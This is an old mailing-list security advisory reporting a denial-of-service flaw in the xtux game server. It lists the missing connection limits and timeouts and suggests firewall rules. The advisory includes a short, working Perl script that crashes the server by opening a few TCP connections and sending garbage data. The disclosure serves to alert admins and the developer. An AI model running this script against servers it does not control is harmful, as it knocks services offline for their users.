xtux server DoS.

From: b0iler _ (b0ilerat_private)
Date: Sat Mar 09 2002 - 14:53:32 PST

    After telnetting into a xtux server a few times and typing random stuff I
    noticed the sever stopped responding.  Xtux is a really cool game for linux,
    you should try it.  It also took up 70% cpu before I killed it.  Then coded
    a small perl script to test this, worked everytime I tested.  I emailed the
    author of xtux a few days ago, haven't heard anything yet.  I figure the
    problems that need to be addressed are:

    the number of connections from one host. - currently unlimitted.
    the total number of connections. - currently unlimitted.
    some sort of timeout for the server - currently the client handles timeouts
    but server allows clients to stay connected without doing anything forever.
    a fix for when users send garbage (don't make the connection correctly) to
    the server and it becomes unresponcive.

    For now I would just set tight firewall rules when you run the xtux server,
    you should know who you are playing with anyways.

    Here is that perl script I used to test:

    #!/usr/bin/perl
    #
    # xtux server DoS - by b0iler
    # server will become unresponcive and takes up lots of CPU.

    use IO::Socket;

    for($n=0;$n<=3;$n++){ #you shouldn't even need all 3 connections.
            print "Connecting to $ARGV[0] port $ARGV[1]\n";
            $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],  PeerPort =>
    $ARGV[1], Proto    => 'tcp' ) or print "\ncouldn't connect\n\n";
            sleep 3;
            print $sock "garbage data\n\n";
    }
    exit;